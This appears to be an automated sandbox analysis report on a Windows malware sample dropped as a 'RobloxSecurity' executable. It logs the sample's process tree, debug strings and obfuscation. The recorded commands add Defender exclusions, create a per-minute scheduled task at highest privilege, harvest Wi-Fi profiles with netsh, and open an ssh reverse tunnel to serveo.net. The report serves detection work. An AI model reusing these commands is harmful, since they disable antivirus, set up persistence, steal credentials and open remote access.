Source: unknown	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\jqOHOuPMJP.exe'; Add-MpPreference -ExclusionProcess 'jqOHOuPMJP'; Add-MpPreference -ExclusionPath 'C:\Windows'; Add-MpPreference -ExclusionPath 'C:\Users\user'	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe" &&START "" "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:6787 serveo.net
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: jqOHOuPMJP.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: jqOHOuPMJP.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: jqOHOuPMJP.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: WINLOA~1.PDBwinload_prod.pdbD966DD2-7850-423A-B1D8-7882CE1A6D15.log source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\system32\rsaenh.dll.pdb\| source: vkefq4cv.oil.exe, 00000012.00000002.2077754048.0000010DF0DFF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: WINLOA~1.PDBwinload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*TOP-A source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\* source: cmd.exe, 00000005.00000003.1850351981.0000022BB8350000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdbWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2S source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\vkefq4cv.oil.exe source: cmd.exe, 00000005.00000002.1851434800.0000022BB8158000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: mscorlib.pdb! source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Configuration.pdbx source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD37000.00000004.00000020.00020000.00000000.sdmp, vkefq4cv.oil.exe, 00000012.00000002.2064616867.0000010DD8610000.00000004.00000800.00020000.00000000.sdmp, WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831EneJ source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: winload_prod.pdbWINLOA~1.PDBWINLOA~1.PDB source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*0 source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Management.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Drawing.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2E source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\Boss\Desktop\Laps\Laps\obj\Release\Laps.pdb source: jqOHOuPMJP.exe
Source:	Binary string: System.Management.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.Core.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831o source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831n source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.1850411128.0000022BB817B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1851434800.0000022BB817C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbR source: vkefq4cv.oil.exe, 00000012.00000002.2076526524.0000010DEFD0C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: System.ni.pdb source: WERCB81.tmp.dmp.41.dr
Source:	Binary string: ntkrnlmp.pdbl source: cmd.exe, 00000005.00000003.1850385696.0000022BB817A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdbRSDS source: WERCB81.tmp.dmp.41.dr

Binary contains a suspicious time stamp

Source: jqOHOuPMJP.exe

Static PE information: 0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067EE438 pushad ; iretd	0_2_067EE445
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067E648F push es; ret	0_2_067E6490
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067E6592 push esp; ret	0_2_067E6599
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Code function: 0_2_067E7162 push eax; retf	0_2_067E7169
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F5632D push eax; ret	1_2_04F56341
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_04F53A9B push ebx; retf	1_2_04F53ADA

Drops PE files

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	File created: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	File created: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "vkefq4cv.oil" /sc MINUTE /tr "C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe" /rl HIGHEST /f

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
